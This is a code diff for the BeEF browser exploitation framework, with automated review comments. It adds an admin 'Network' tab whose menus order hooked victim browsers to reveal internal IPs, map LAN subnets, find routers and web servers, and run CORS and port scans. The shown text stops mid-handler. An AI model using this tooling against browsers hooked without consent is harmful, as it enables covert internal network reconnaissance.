diff --git a/Gemfile b/Gemfile
index a873eeb9e..11297d839 100644
--- a/Gemfile
+++ b/Gemfile
@@ -41,6 +41,7 @@ gem "msfrpc-client" # Metasploit Integration extension
gem "rubyzip", ">= 1.0.0"
gem "rubydns", "0.7.0" # DNS extension
gem "geoip" # geolocation support
+gem "dm-serializer" # network extension
# For running unit tests
if ENV['BEEF_TEST']
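Review bot: The added `gem "dm-serializer"` line carries no version constraint, unlike `rubydns` and `rubyzip` just above it, so an install without a committed lockfile resolves to whatever release is current. Since this gem is normally versioned with the rest of the DataMapper family, I would pin it to the same series as the project's other `dm-*` gems, e.g. `gem "dm-serializer", "~> <DM_VERSION_PLACEHOLDER>" # network extension`. It is also installed for every deployment although the comment ties it to an optional extension; confirm that is intended.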
diff --git a/core/main/handlers/browserdetails.rb b/core/main/handlers/browserdetails.rb
index 0541d3393..a91e2c937 100644
--- a/core/main/handlers/browserdetails.rb
+++ b/core/main/handlers/browserdetails.rb
@@ -177,6 +177,13 @@ module BeEF
unless proxy_server.nil?
BD.set(session_id, 'ProxyServer', "#{proxy_server}")
proxy_log_string += " [server: #{proxy_server}]"
+ if config.get("beef.extension.network.enable") == true
+ if proxy_server =~ /^([\d\.]+):([\d]+)$/
+ print_debug("Hooked browser [id:#{zombie.id}] is using a proxy [ip: #{$1}]")
+ r = BeEF::Core::Models::NetworkHost.new(:hooked_browser_id => session_id, :ip => $1, :type => 'Proxy', :cid => 'init')
+ r.save
+ end
+ end
end
BeEF::Core::Logger.instance.register('Zombie', "#{proxy_log_string}", "#{zombie.id}")
end
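Review bot: The added check `proxy_server =~ /^([\d\.]+):([\d]+)$/` uses `^`/`$`, which match at line boundaries, and `[\d\.]+` accepts strings such as `1..2` or `999.999.999.999`. A multi-line or malformed value (which appears to be reported by the hooked browser) can therefore still produce a `NetworkHost` row. Anchor on the whole string and validate the octets, e.g. `if (m = proxy_server.match(/\A(\d{1,3}(?:\.\d{1,3}){3}):(\d+)\z/))`, then use `m[1]` instead of `$1`. The return value of `r.save` is ignored and nothing looks for an existing row, so a failed save goes unnoticed and repeated initialisation presumably inserts duplicates. The enclosing method starts and ends outside this hunk.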
diff --git a/extensions/admin_ui/api/handler.rb b/extensions/admin_ui/api/handler.rb
index 49deb4074..5b827d099 100644
--- a/extensions/admin_ui/api/handler.rb
+++ b/extensions/admin_ui/api/handler.rb
@@ -33,7 +33,7 @@ module API
#NOTE: order counts! make sure you know what you're doing if you add files
esapi = %w(esapi/Class.create.js esapi/jquery-1.6.4.min.js esapi/jquery-encoder-0.1.0.js)
ux = %w(ui/common/beef_common.js ux/PagingStore.js ux/StatusBar.js ux/TabCloseMenu.js)
- panel = %w(ui/panel/common.js ui/panel/DistributedEngine.js ui/panel/PanelStatusBar.js ui/panel/tabs/ZombieTabDetails.js ui/panel/tabs/ZombieTabLogs.js ui/panel/tabs/ZombieTabCommands.js ui/panel/tabs/ZombieTabRider.js ui/panel/tabs/ZombieTabXssRays.js wterm/wterm.jquery.js ui/panel/tabs/ZombieTabIpec.js ui/panel/tabs/ZombieTabAutorun.js ui/panel/PanelViewer.js ui/panel/DataGrid.js ui/panel/MainPanel.js ui/panel/ZombieTab.js ui/panel/ZombieTabs.js ui/panel/zombiesTreeList.js ui/panel/ZombiesMgr.js ui/panel/Logout.js ui/panel/WelcomeTab.js ui/panel/ModuleSearching.js)
+ panel = %w(ui/panel/common.js ui/panel/DistributedEngine.js ui/panel/PanelStatusBar.js ui/panel/tabs/ZombieTabDetails.js ui/panel/tabs/ZombieTabLogs.js ui/panel/tabs/ZombieTabCommands.js ui/panel/tabs/ZombieTabRider.js ui/panel/tabs/ZombieTabXssRays.js wterm/wterm.jquery.js ui/panel/tabs/ZombieTabIpec.js ui/panel/tabs/ZombieTabAutorun.js ui/panel/PanelViewer.js ui/panel/DataGrid.js ui/panel/MainPanel.js ui/panel/ZombieTab.js ui/panel/ZombieTabs.js ui/panel/zombiesTreeList.js ui/panel/ZombiesMgr.js ui/panel/tabs/ZombieTabNetwork.js ui/panel/Logout.js ui/panel/WelcomeTab.js ui/panel/ModuleSearching.js)
global_js = esapi + ux + panel
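Review bot: `ui/panel/tabs/ZombieTabNetwork.js` is inserted after `ui/panel/ZombiesMgr.js`, whereas every other `ui/panel/tabs/*` script in this list loads before `ui/panel/ZombieTab.js`, and the comment above warns that order counts. Because `ZombieTab.js` now references `ZombieTab_Network`, I would place the new entry next to `ui/panel/tabs/ZombieTabAutorun.js`, so that the constructor is defined before the panel that uses it regardless of when the panel is first instantiated.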
diff --git a/extensions/admin_ui/media/css/base.css b/extensions/admin_ui/media/css/base.css
index 7c0c8c046..6c7f85b26 100644
--- a/extensions/admin_ui/media/css/base.css
+++ b/extensions/admin_ui/media/css/base.css
@@ -93,6 +93,70 @@
padding-top: 3px;
}
+/*
+ * Network Panel
+ ****************************************/
+.network-host-ctxMenu-config {
+ background-image: url(../images/icons/tools.png);
+ background-size: 16px 16px;
+ background-repeat: no-repeat;
+}
+
+.network-host-ctxMenu-host {
+ background-image: url(../images/icons/pc.png);
+ background-size: 16px 16px;
+ background-repeat: no-repeat;
+}
+
+.network-host-ctxMenu-network {
+ background-image: url(../images/icons/network.png);
+ background-size: 16px 16px;
+ background-repeat: no-repeat;
+}
+
+.network-host-ctxMenu-web {
+ background-image: url(../images/icons/web.png);
+ background-size: 16px 16px;
+ background-repeat: no-repeat;
+}
+
+.network-host-ctxMenu-adapter {
+ background-image: url(../images/icons/adapter.png);
+ background-size: 16px 16px;
+ background-repeat: no-repeat;
+}
+
+.network-host-ctxMenu-router {
+ background-image: url(../images/icons/router.png);
+ background-size: 16px 16px;
+ background-repeat: no-repeat;
+}
+
+.network-host-ctxMenu-fingerprint {
+ background-image: url(../images/icons/magnifier.png);
+ background-size: 16px 16px;
+ background-repeat: no-repeat;
+}
+
+.network-host-ctxMenu-cors {
+ background-image: url(../images/icons/cors.png);
+ background-size: 16px 16px;
+ background-repeat: no-repeat;
+}
+
+.network-host-ctxMenu-shellshock {
+ background-image: url(../images/icons/shellshock.png);
+ background-size: 16px 16px;
+ background-repeat: no-repeat;
+}
+
+.network-host-ctxMenu-php {
+ background-image: url(../images/icons/php.png);
+ background-size: 16px 16px;
+ background-repeat: no-repeat;
+}
+
+
/*
* Ext.beef.msg
****************************************/
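Review bot: The ten new `.network-host-ctxMenu-*` rules repeat the same `background-size: 16px 16px;` and `background-repeat: no-repeat;` pair and differ only in the image URL. A single shared rule such as `[class*="network-host-ctxMenu-"] { background-size: 16px 16px; background-repeat: no-repeat; }` would leave each icon class with just its `background-image` line, so a later size change cannot miss one icon. The section also ends with two blank lines before the `Ext.beef.msg` header where the rest of the file uses one.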
diff --git a/extensions/admin_ui/media/images/icons/adapter.png b/extensions/admin_ui/media/images/icons/adapter.png
new file mode 100644
index 000000000..43b7a63ea
Binary files /dev/null and b/extensions/admin_ui/media/images/icons/adapter.png differ
diff --git a/extensions/admin_ui/media/images/icons/cors.png b/extensions/admin_ui/media/images/icons/cors.png
new file mode 100644
index 000000000..71127f9be
Binary files /dev/null and b/extensions/admin_ui/media/images/icons/cors.png differ
diff --git a/extensions/admin_ui/media/images/icons/magnifier.png b/extensions/admin_ui/media/images/icons/magnifier.png
new file mode 100644
index 000000000..985cc236f
Binary files /dev/null and b/extensions/admin_ui/media/images/icons/magnifier.png differ
diff --git a/extensions/admin_ui/media/images/icons/network.png b/extensions/admin_ui/media/images/icons/network.png
new file mode 100644
index 000000000..132491d14
Binary files /dev/null and b/extensions/admin_ui/media/images/icons/network.png differ
diff --git a/extensions/admin_ui/media/images/icons/pc.png b/extensions/admin_ui/media/images/icons/pc.png
index d8f38aca7..8d207a8d0 100644
Binary files a/extensions/admin_ui/media/images/icons/pc.png and b/extensions/admin_ui/media/images/icons/pc.png differ
diff --git a/extensions/admin_ui/media/images/icons/php.png b/extensions/admin_ui/media/images/icons/php.png
new file mode 100644
index 000000000..e1830d000
Binary files /dev/null and b/extensions/admin_ui/media/images/icons/php.png differ
diff --git a/extensions/admin_ui/media/images/icons/router.png b/extensions/admin_ui/media/images/icons/router.png
new file mode 100644
index 000000000..09ba9cb92
Binary files /dev/null and b/extensions/admin_ui/media/images/icons/router.png differ
diff --git a/extensions/admin_ui/media/images/icons/shellshock.png b/extensions/admin_ui/media/images/icons/shellshock.png
new file mode 100644
index 000000000..6f6347c06
Binary files /dev/null and b/extensions/admin_ui/media/images/icons/shellshock.png differ
diff --git a/extensions/admin_ui/media/images/icons/tools.png b/extensions/admin_ui/media/images/icons/tools.png
new file mode 100644
index 000000000..2a1e72744
Binary files /dev/null and b/extensions/admin_ui/media/images/icons/tools.png differ
diff --git a/extensions/admin_ui/media/images/icons/web.png b/extensions/admin_ui/media/images/icons/web.png
new file mode 100644
index 000000000..2db402969
Binary files /dev/null and b/extensions/admin_ui/media/images/icons/web.png differ
diff --git a/extensions/admin_ui/media/javascript/ui/panel/WelcomeTab.js b/extensions/admin_ui/media/javascript/ui/panel/WelcomeTab.js
index 932811ca0..0485255ff 100644
--- a/extensions/admin_ui/media/javascript/ui/panel/WelcomeTab.js
+++ b/extensions/admin_ui/media/javascript/ui/panel/WelcomeTab.js
@@ -35,7 +35,8 @@ WelcomeTab = function() {
The command module does not work against this target
\
XssRays: The XssRays tab allows the user to check if links, forms and URI path of the page (where the browser is hooked) is vulnerable to XSS. \
Rider: The Rider tab allows you to submit arbitrary HTTP requests on behalf of the hooked browser. \
- Each request sent by the Rider is recorded in the History panel. Click a history item to view the HTTP headers and HTML source of the HTTP response.
\
+ Each request sent by the Rider is recorded in the History panel. Click a history item to view the HTTP headers and HTML source of the HTTP response. \
+ Network: The Network tab allows you to interact with hosts on the local network(s) of the hooked browser.
\
You can also right-click a hooked browser to open a context-menu with additional functionality:
\
\
- Tunneling Proxy: The Proxy allows you to use a hooked browser as a proxy. Simply right-click a browser from the Hooked Browsers tree to the left and select \"Use as Proxy\". \
diff --git a/extensions/admin_ui/media/javascript/ui/panel/ZombieTab.js b/extensions/admin_ui/media/javascript/ui/panel/ZombieTab.js
index 06fdc03e4..9147e301d 100644
--- a/extensions/admin_ui/media/javascript/ui/panel/ZombieTab.js
+++ b/extensions/admin_ui/media/javascript/ui/panel/ZombieTab.js
@@ -9,27 +9,29 @@ ZombieTab = function(zombie) {
log_tab = new ZombieTab_LogTab(zombie);
commands_tab = new ZombieTab_Commands(zombie);
requester_tab = new ZombieTab_Requester(zombie);
- xssrays_tab = new ZombieTab_XssRaysTab(zombie);
- ipec_tab = new ZombieTab_IpecTab(zombie);
- autorun_tab = new ZombieTab_Autorun(zombie);
+ xssrays_tab = new ZombieTab_XssRaysTab(zombie);
+ ipec_tab = new ZombieTab_IpecTab(zombie);
+ autorun_tab = new ZombieTab_Autorun(zombie);
+ network_tab = new ZombieTab_Network(zombie);
+
ZombieTab.superclass.constructor.call(this, {
- id:"current-browser",
+ id:"current-browser",
activeTab: 0,
loadMask: {msg:'Loading browser...'},
- title: "Current Browser",
+ title: "Current Browser",
autoScroll: true,
closable: false,
viewConfig: {
forceFit: true,
type: 'fit'
},
- items:[main_tab, log_tab, commands_tab, requester_tab, xssrays_tab, ipec_tab, autorun_tab],
- listeners:{
- afterrender:function(component){
- // Hide auto-run tab
- component.hideTabStripItem(autorun_tab);
- }
- }
+ items:[main_tab, log_tab, commands_tab, requester_tab, xssrays_tab, ipec_tab, autorun_tab, network_tab],
+ listeners:{
+ afterrender:function(component){
+ // Hide auto-run tab
+ component.hideTabStripItem(autorun_tab);
+ }
+ }
});
};
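Review bot: `network_tab` is constructed and appended to `items` unconditionally, while the server-side change in core/main/handlers/browserdetails.rb records hosts only when `beef.extension.network.enable` is true. With the extension disabled the tab would presumably still be shown and its `/api/network/...` store requests would fail. Consider adding the tab only when the extension is reported as enabled, or hiding it in `afterrender` the way `autorun_tab` is hidden. Separately, `network_tab = new ZombieTab_Network(zombie);` is assigned without `var`, like its neighbours, which leaks an implicit global shared by every `ZombieTab` instance; `var network_tab = new ZombieTab_Network(zombie);` avoids that. The whitespace-only re-indentation mixed into this hunk obscures the two functional lines and would be better as its own commit.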
diff --git a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabNetwork.js b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabNetwork.js
new file mode 100644
index 000000000..dfd9e4bf3
--- /dev/null
+++ b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabNetwork.js
@@ -0,0 +1,822 @@
+//
+// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+/*
+ * The Network tab panel for the selected zombie browser.
+ * Loaded in /ui/panel/index.html
+ */
+ZombieTab_Network = function(zombie) {
+
+ // The status bar.
+ var commands_statusbar = new Beef_StatusBar('network-bbar-zombie-'+zombie.session);
+ // RESTful API token
+ var token = beefwui.get_rest_token();
+
+ // get module ID from name
+ var get_module_id = function(name){
+ var id = "";
+ $jwterm.ajax({
+ type: 'GET',
+ url: "/api/modules/search/" + name + "?token=" + token,
+ async: false,
+ processData: false,
+ success: function(data){
+ id = data.id;
+ },
+ error: function(){
+ commands_statusbar.update_fail("Error getting module id for '"+mod_name+"'");
+ }
+ });
+ return id;
+ }
+
+ /*
+ * The panel that displays all identified network services grouped by host
+ ********************************************/
+ var hosts_panel_store = new Ext.ux.data.PagingJsonStore({
+ storeId: 'network-host-store-zombie-'+zombie.session,
+ proxy: new Ext.data.HttpProxy({
+ url: '/api/network/hosts/'+zombie.session+'?token='+token,
+ method: 'GET'
+ }),
+ remoteSort: false,
+ autoDestroy: true,
+ autoLoad: false,
+ root: 'hosts',
+ fields: ['id', 'ip', 'hostname', 'type', 'os', 'mac'],
+ sortInfo: {field: 'ip', direction: 'ASC'}
+ });
+
+ var req_pagesize = 50;
+
+ var hosts_panel_bbar = new Ext.PagingToolbar({
+ pageSize: req_pagesize,
+ store: hosts_panel_store,
+ displayInfo: true,
+ displayMsg: 'Displaying network hosts {0} - {1} of {2}',
+ emptyMsg: 'No hosts to display'
+ });
+
+ var hosts_panel_grid = new Ext.grid.GridPanel({
+ id: 'network-host-grid-zombie-'+zombie.session,
+ store: hosts_panel_store,
+ bbar: hosts_panel_bbar,
+ border: false,
+ loadMask: {msg:'Loading network hosts...'},
+
+ viewConfig: {
+ forceFit: true
+ },
+
+ view: new Ext.grid.GridView({
+ forceFit: true,
+ emptyText: "No hosts",
+ enableRowBody:true
+ }),
+
+ columns: [
+ {header: 'Id', width: 5, sortable: true, dataIndex: 'id', hidden:true},
+ {header: 'IP Address', width: 10, sortable: true, dataIndex: 'ip', renderer: function(value){return $jEncoder.encoder.encodeForHTML(value)}},
+ {header: 'Host Name', width: 10, sortable: true, dataIndex: 'hostname', renderer: function(value){return $jEncoder.encoder.encodeForHTML(value)}},
+ {header: 'Type', width: 20, sortable: true, dataIndex: 'type', renderer: function(value){return $jEncoder.encoder.encodeForHTML(value)}},
+ {header: 'Operating System', width: 10, sortable: true, dataIndex: 'os', renderer: function(value){return $jEncoder.encoder.encodeForHTML(value)}},
+ {header: 'MAC Address', width: 10, sortable: true, dataIndex: 'mac', renderer: function(value){return $jEncoder.encoder.encodeForHTML(value)}}
+ ],
+
+ listeners: {
+ rowclick: function(grid, rowIndex) {
+ var r = grid.getStore().getAt(rowIndex).data;
+ },
+ contextmenu: function(e, element, options) {
+ e.preventDefault();
+ },
+ containercontextmenu: function(view, e) {
+ e.preventDefault();
+ var emptygrid_menu = new Ext.menu.Menu({
+ items: [
+ {
+ text: 'Get Internal IP Address',
+ iconCls: 'network-host-ctxMenu-adapter',
+ handler: function() {
+ var mod_id = get_module_id("get_internal_ip_webrtc");
+ commands_statusbar.update_sending('Identifying zombie network adapters ...');
+ $jwterm.ajax({
+ contentType: 'application/json',
+ data: JSON.stringify({}),
+ dataType: 'json',
+ type: 'POST',
+ url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token,
+ async: false,
+ processData: false,
+ success: function(data){
+ commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully");
+ },
+ error: function(){
+ commands_statusbar.update_fail('Error sending command');
+ }
+ });
+ }
+ },{
+ text: 'Identify LAN Subnets',
+ iconCls: 'network-host-ctxMenu-network',
+ handler: function() {
+ var mod_id = get_module_id("identify_lan_subnets");
+ commands_statusbar.update_sending('Identifying zombie LAN subnets ...');
+ $jwterm.ajax({
+ contentType: 'application/json',
+ data: JSON.stringify({}),
+ dataType: 'json',
+ type: 'POST',
+ url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token,
+ async: false,
+ processData: false,
+ success: function(data){
+ commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully");
+ },
+ error: function(){
+ commands_statusbar.update_fail('Error sending command');
+ }
+ });
+ }
+ },{
+ text: 'Discover Routers',
+ iconCls: 'network-host-ctxMenu-router',
+ handler: function() {
+ var mod_id = get_module_id("fingerprint_routers");
+ commands_statusbar.update_sending('Scanning commonly used local area network IP addresses for routers ...');
+ $jwterm.ajax({
+ contentType: 'application/json',
+ data: JSON.stringify({}),
+ dataType: 'json',
+ type: 'POST',
+ url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token,
+ async: false,
+ processData: false,
+ success: function(data){
+ commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully");
+ },
+ error: function(){
+ commands_statusbar.update_fail('Error sending command');
+ }
+ });
+ }
+ },{
+ text: 'Discover Web Servers',
+ iconCls: 'network-host-ctxMenu-web',
+ menu: {
+ xtype: 'menu',
+ items: [{
+ text: 'Common LAN IPs',
+ iconCls: 'network-host-ctxMenu-network',
+ handler: function() {
+ var mod_name = "get_http_servers";
+ var mod_id = get_module_id(mod_name);
+ commands_statusbar.update_sending('Favicon scanning commonly used local area network IP addresses for web servers...');
+ $jwterm.ajax({
+ contentType: 'application/json',
+ data: JSON.stringify({"ipRange":"common"}),
+ dataType: 'json',
+ type: 'POST',
+ url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token,
+ async: false,
+ processData: false,
+ success: function(data){
+ commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully");
+ },
+ error: function(){
+ commands_statusbar.update_fail('Error executing module ' + mod_name + ' [id: ' + mod_id + ']');
+ }
+ });
+ }
+ },{
+ text: 'Specify IP Range',
+ iconCls: 'network-host-ctxMenu-config',
+ handler: function() {
+ var ip_range = prompt("Enter IP range to scan:", '192.168.1.1-192.168.1.254');
+ if (!ip_range) {
+ commands_statusbar.update_fail('Cancelled');
+ return;
+ }
+ var mod_name = "get_http_servers";
+ var mod_id = get_module_id(mod_name);
+ commands_statusbar.update_sending('Favicon scanning ' + ip_range + ' for web servers...');
+ $jwterm.ajax({
+ contentType: 'application/json',
+ data: JSON.stringify({"ipRange":ip_range}),
+ dataType: 'json',
+ type: 'POST',
+ url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token,
+ async: false,
+ processData: false,
+ success: function(data){
+ commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully");
+ },
+ error: function(){
+ commands_statusbar.update_fail('Error executing module ' + mod_name + ' [id: ' + mod_id + ']');
+ }
+ });
+ }
+ }]
+ }
+ },{
+ text: 'Fingerprint HTTP',
+ iconCls: 'network-host-ctxMenu-fingerprint',
+ menu: {
+ xtype: 'menu',
+ items: [{
+ text: 'Common LAN IPs',
+ iconCls: 'network-host-ctxMenu-network',
+ handler: function() {
+ var mod_name = "internal_network_fingerprinting";
+ var mod_id = get_module_id(mod_name);
+ commands_statusbar.update_sending('Fingerprinting commonly used local area network IP addresses...');
+ $jwterm.ajax({
+ contentType: 'application/json',
+ data: JSON.stringify({"ipRange":"common"}),
+ dataType: 'json',
+ type: 'POST',
+ url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token,
+ async: false,
+ processData: false,
+ success: function(data){
+ commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully");
+ },
+ error: function(){
+ commands_statusbar.update_fail('Error executing module ' + mod_name + ' [id: ' + mod_id + ']');
+ }
+ });
+ }
+ },{
+ text: 'Specify IP Range',
+ iconCls: 'network-host-ctxMenu-config',
+ handler: function() {
+ var ip_range = prompt("Enter IP range to scan:", '192.168.1.1-192.168.1.254');
+ if (!ip_range) {
+ commands_statusbar.update_fail('Cancelled');
+ return;
+ }
+ var mod_name = "internal_network_fingerprinting";
+ var mod_id = get_module_id(mod_name);
+ commands_statusbar.update_sending('Fingerprinting ' + ip_range + '...');
+ $jwterm.ajax({
+ contentType: 'application/json',
+ data: JSON.stringify({"ipRange":ip_range}),
+ dataType: 'json',
+ type: 'POST',
+ url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token,
+ async: false,
+ processData: false,
+ success: function(data){
+ commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully");
+ },
+ error: function(){
+ commands_statusbar.update_fail('Error executing module ' + mod_name + ' [id: ' + mod_id + ']');
+ }
+ });
+ }
+ }]
+ }
+ },{
+ text: 'CORS Scan',
+ iconCls: 'network-host-ctxMenu-cors',
+ menu: {
+ xtype: 'menu',
+ items: [{
+ text: 'Common LAN IPs',
+ iconCls: 'network-host-ctxMenu-network',
+ handler: function() {
+ var mod_name = "cross_origin_scanner";
+ var mod_id = get_module_id(mod_name);
+ commands_statusbar.update_sending('CORS scanning commonly used local area network IP addresses...');
+ $jwterm.ajax({
+ contentType: 'application/json',
+ data: JSON.stringify({"ipRange":"common"}),
+ dataType: 'json',
+ type: 'POST',
+ url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token,
+ async: false,
+ processData: false,
+ success: function(data){
+ commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully");
+ },
+ error: function(){
+ commands_statusbar.update_fail('Error executing module ' + mod_name + ' [id: ' + mod_id + ']');
+ }
+ });
+ }
+ },{
+ text: 'Specify IP Range',
+ iconCls: 'network-host-ctxMenu-config',
+ handler: function() {
+ var ip_range = prompt("Enter IP range to scan:", '192.168.1.1-192.168.1.254');
+ if (!ip_range) {
+ commands_statusbar.update_fail('Cancelled');
+ return;
+ }
+ var mod_name = "cross_origin_scanner";
+ var mod_id = get_module_id(mod_name);
+ commands_statusbar.update_sending('CORS scanning ' + ip_range + '...');
+ $jwterm.ajax({
+ contentType: 'application/json',
+ data: JSON.stringify({"ipRange":ip_range}),
+ dataType: 'json',
+ type: 'POST',
+ url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token,
+ async: false,
+ processData: false,
+ success: function(data){
+ commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully");
+ },
+ error: function(){
+ commands_statusbar.update_fail('Error executing module ' + mod_name + ' [id: ' + mod_id + ']');
+ }
+ });
+ }
+ }]
+ }
+ }]
+ });
+ emptygrid_menu.showAt(e.getXY());
+ },
+ rowcontextmenu: function(grid, rowIndex, e) {
+ e.preventDefault();
+ grid.getSelectionModel().selectRow(rowIndex);
+ if (!!grid.rowCtxMenu) {
+ grid.rowCtxMenu.destroy();
+ }
+ var record = grid.selModel.getSelected();
+ var ip = record.get('ip');
+ var class_c = ip.split(".")[0]+"."+ip.split(".")[1]+"."+ip.split(".")[2];
+ var ip_range = class_c+'.1-'+class_c+'.255';
+ grid.rowCtxMenu = new Ext.menu.Menu({
+ items: [
+ {
+ text: 'Discover Web Servers',
+ iconCls: 'network-host-ctxMenu-web',
+ menu: {
+ xtype: 'menu',
+ items: [{
+ text: 'Host ('+ip+')',
+ iconCls: 'network-host-ctxMenu-host',
+ handler: function() {
+ var mod_id = get_module_id("get_http_servers");
+ commands_statusbar.update_sending('Favicon scanning ' + ip + ' for HTTP servers...');
+ $jwterm.ajax({
+ contentType: 'application/json',
+ data: JSON.stringify({"ipRange":ip+'-'+ip}),
+ dataType: 'json',
+ type: 'POST',
+ url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token,
+ async: false,
+ processData: false,
+ success: function(data){
+ commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully");
+ },
+ error: function(){
+ commands_statusbar.update_fail('Error sending command');
+ }
+ });
+ }
+ },{
+ text: 'Network ('+class_c+'.0/24)',
+ iconCls: 'network-host-ctxMenu-network',
+ handler: function() {
+ var mod_id = get_module_id("get_http_servers");
+ commands_statusbar.update_sending('Favicon scanning ' + ip_range + ' for HTTP servers...');
+ $jwterm.ajax({
+ contentType: 'application/json',
+ data: JSON.stringify({"ipRange":ip_range}),
+ dataType: 'json',
+ type: 'POST',
+ url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token,
+ async: false,
+ processData: false,
+ success: function(data){
+ commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully");
+ },
+ error: function(){
+ commands_statusbar.update_fail('Error sending command');
+ }
+ });
+ }
+ }]
+ }
+ },{
+ text: 'Fingerprint HTTP',
+ iconCls: 'network-host-ctxMenu-fingerprint',
+ menu: {
+ xtype: 'menu',
+ items: [{
+ text: 'Host ('+ip+')',
+ iconCls: 'network-host-ctxMenu-host',
+ handler: function() {
+ var mod_id = get_module_id("internal_network_fingerprinting");
+ commands_statusbar.update_sending('Fingerprinting ' + ip + '...');
+ $jwterm.ajax({
+ contentType: 'application/json',
+ data: JSON.stringify({"ipRange":ip+'-'+ip}),
+ dataType: 'json',
+ type: 'POST',
+ url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token,
+ async: false,
+ processData: false,
+ success: function(data){
+ commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully");
+ },
+ error: function(){
+ commands_statusbar.update_fail('Error sending command');
+ }
+ });
+ }
+ },{
+ text: 'Network ('+class_c+'.0/24)',
+ iconCls: 'network-host-ctxMenu-network',
+ handler: function() {
+ var mod_id = get_module_id("internal_network_fingerprinting");
+ commands_statusbar.update_sending('Fingerprinting ' + ip_range + '...');
+ $jwterm.ajax({
+ contentType: 'application/json',
+ data: JSON.stringify({"ipRange":ip_range}),
+ dataType: 'json',
+ type: 'POST',
+ url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token,
+ async: false,
+ processData: false,
+ success: function(data){
+ commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully");
+ },
+ error: function(){
+ commands_statusbar.update_fail('Error sending command');
+ }
+ });
+ }
+ }]
+ }
+ },{
+ text: 'CORS Scan',
+ iconCls: 'network-host-ctxMenu-cors',
+ menu: {
+ xtype: 'menu',
+ items: [{
+ text: 'Host ('+ip+')',
+ iconCls: 'network-host-ctxMenu-host',
+ handler: function() {
+ var mod_id = get_module_id("cross_origin_scanner");
+ commands_statusbar.update_sending('CORS scanning ' + ip + '...');
+ $jwterm.ajax({
+ contentType: 'application/json',
+ data: JSON.stringify({"ipRange":ip+'-'+ip}),
+ dataType: 'json',
+ type: 'POST',
+ url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token,
+ async: false,
+ processData: false,
+ success: function(data){
+ commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully");
+ },
+ error: function(){
+ commands_statusbar.update_fail('Error sending command');
+ }
+ });
+ }
+ },{
+ text: 'Network ('+class_c+'.0/24)',
+ iconCls: 'network-host-ctxMenu-network',
+ handler: function() {
+ var mod_id = get_module_id("cross_origin_scanner");
+ commands_statusbar.update_sending('CORS scanning ' + ip_range + '...');
+ $jwterm.ajax({
+ contentType: 'application/json',
+ data: JSON.stringify({"ipRange":ip_range}),
+ dataType: 'json',
+ type: 'POST',
+ url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token,
+ async: false,
+ processData: false,
+ success: function(data){
+ commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully");
+ },
+ error: function(){
+ commands_statusbar.update_fail('Error sending command');
+ }
+ });
+ }
+ }]
+ }
+ },{
+ text: 'Port Scan',
+ iconCls: 'network-host-ctxMenu-network',
+ menu: {
+ xtype: 'menu',
+ items: [{
+ text: 'Common Ports',
+ iconCls: 'network-host-ctxMenu-host',
+ handler: function() {
+ var mod_id = get_module_id("port_scanner");
+ var ports = '21,22,23,25,80,81,443,445,1080,8080,8081,8090,8443,3000,3128,3389,3306,5432,6379,10000,10443';
+ commands_statusbar.update_sending('Port scanning ' + ip + '...');
+ $jwterm.ajax({
+ contentType: 'application/json',
+ data: JSON.stringify({"ipHost":ip,"ports":ports}),
+ dataType: 'json',
+ type: 'POST',
+ url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token,
+ async: false,
+ processData: false,
+ success: function(data){
+ commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully");
+ },
+ error: function(){
+ commands_statusbar.update_fail('Error sending command');
+ }
+ });
+ }
+ },{
+ text: 'Specify Ports',
+ iconCls: 'network-host-ctxMenu-config',
+ handler: function() {
+ var mod_id = get_module_id("port_scanner");
+ var ports = prompt("Enter ports to scan:", '1,5,7,9,15,20,21,22,23,25,26,29,33,37,42,43,53,67,68,69,70,76,79,80,88,90,98,101,106,109,110,111,113,114,115,118,119,123,129,132,133,135,136,137,138,139,143,144,156,158,161,162,168,174,177,194,197,209,213,217,219,220,223,264,315,316,346,353,389,413,414,415,416,440,443,444,445,453,454,456,457,458,462,464,465,466,480,486,497,500,501,516,518,522,523,524,525,526,533,535,538,540,541,542,543,544,545,546,547,556,557,560,561,563,564,625,626,631,636,637,660,664,666,683,740,741,742,744,747,748,749,750,751,752,753,754,758,760,761,762,763,764,765,767,771,773,774,775,776,780,781,782,783,786,787,799,800,801,808,871,873,888,898,901,953,989,990,992,993,994,995,996,997,998,999,1000,1002,1008,1023,1024,1080,8080,8443,8050,3306,5432,1521,1433,3389,10088');
+ if (!ports) {
+ commands_statusbar.update_fail('Cancelled');
+ return;
+ }
